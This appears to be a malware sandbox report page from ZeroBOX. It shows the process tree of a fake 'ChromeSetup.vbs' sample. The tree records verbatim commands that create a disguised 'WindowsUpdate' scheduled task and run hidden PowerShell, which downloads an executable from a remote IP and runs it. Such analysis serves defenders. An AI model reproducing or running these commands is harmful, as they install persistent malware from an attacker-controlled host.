| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
11.15 01:11
wwbizsrvs.exe
11.15 01:11
op.exe
11.15 01:11
msf.exe
11.15 01:11
lum250.exe
11.15 01:11
msf443.exe
11.13 04:11
hello.exe
11.13 03:11
espsemhvcioff.exe
11.13 02:11
Geek_se.exe
11.13 02:11
cred64.dll
11.13 02:11
svhost.exe

Latest News
11.15 04:11
LG유플러스, 네트워크 협력사와 동반성장...
11.15 04:11
중고 골프채 사이트 1등골프, 인기 브랜...
11.15 04:11
Safeguarding Healthcar...
11.15 04:11
Musk’s X Sues to Block...
11.15 04:11
[CEO 보안칼럼] “다윗은 언제나 골리...
11.15 04:11
자민경 달팽이 크림, PX 누적 판매 1...
11.15 04:11
라쿠텐·쉽너지, 일본 역직구 판매자 위한...
11.15 04:11
명지대, 서울마이칼리지 점프업 사업 ‘서...
11.15 04:11
JioStar Eyes India Str...
11.15 04:11
Meta to Appeal Orders ...

| ZeroBOX

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\ChromeSetup.vbs
2556
- schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://104.168.46.25/890/oj/hkcmds.exe -o C:\Windows\Temp\hkcmd.exe;Start-Process powershell.exe C:\Windows\Temp\hkcmd.exe -NoNewWindow
  2636
- powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://104.168.46.25/890/oj/hkcmds.exe -o C:\Windows\Temp\hkcmd.exe; Start-Process powershell.exe C:\Windows\Temp\hkcmd.exe -NoNewWindow }"
  2692
  - curl.exe "C:\util\curl\curl.exe" http://104.168.46.25/890/oj/hkcmds.exe -o C:\Windows\Temp\hkcmd.exe
    2836
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\Temp\hkcmd.exe
    2900
    - hkcmd.exe "C:\Windows\Temp\hkcmd.exe"
      2980

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf